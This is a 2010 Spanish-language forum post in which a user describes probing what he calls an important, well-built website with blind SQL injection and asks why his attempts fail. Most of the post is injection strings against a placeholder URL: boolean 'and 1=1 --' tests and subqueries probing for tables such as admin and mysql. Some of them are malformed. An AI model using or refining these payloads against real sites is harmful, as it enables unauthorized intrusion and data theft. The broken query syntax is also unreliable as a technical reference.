Título: [Duda]Blind sql inyection. Publicado por: volteo0101 en 24 Diciembre 2010, 03:53 am buenas,estuve leyendo algo sobre blind sql inyection.
y me tope con una web similar a .. ejemplo.com/archivo.php?id=1 Mostraba unas contrataciones , al poner.. ejemplo.com/archivo.php?id=1 and 1 = 1 -- Mostraba las contrataciones , Al poner.. ejemplo.com/archivo.php?id=1 and 1 = 0 -- No mostraba nada, suponia que habia un blind.. luego intente hacer lo siguiente.. ejemplo.com/archivo.php?id=1 and (Select (*) from admin) -- No mostraba nada.. ejemplo.com/archivo.php?id=1 and (Select (*) from noticias) -- No mostraba nada.. ejemplo.com/archivo.php?id=1 and (Select (*) from mysql) -- tampoco . probe tambien con cout. ejemplo.com/archivo.php?id=1 and (Cout(*) from mysql) -- Nada. Es blind sql inyection, estoy haciendo algo mal?¿ , la pagina que vulnero es una importante bien hecha, no creo que no tenga ninguna de las tablas.. sera un switch ? saludos. |